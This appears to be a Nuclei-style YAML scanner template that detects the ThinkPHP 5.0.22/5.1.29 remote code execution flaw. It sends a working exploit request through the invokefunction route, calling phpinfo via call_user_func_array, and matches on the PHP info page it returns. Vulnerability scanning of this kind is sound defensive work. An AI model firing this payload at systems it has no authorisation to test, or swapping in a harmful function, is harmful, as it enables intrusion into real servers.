30 lines
980 B
YAML
30 lines
980 B
YAML
id: thinkphp-5022-rce
|
|
|
|
info:
|
|
name: ThinkPHP - Remote Code Execution
|
|
author: dr_set
|
|
severity: critical
|
|
description: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
|
|
tags: thinkphp,rce
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "PHP Extension"
|
|
- "PHP Version"
|
|
- "ThinkPHP"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|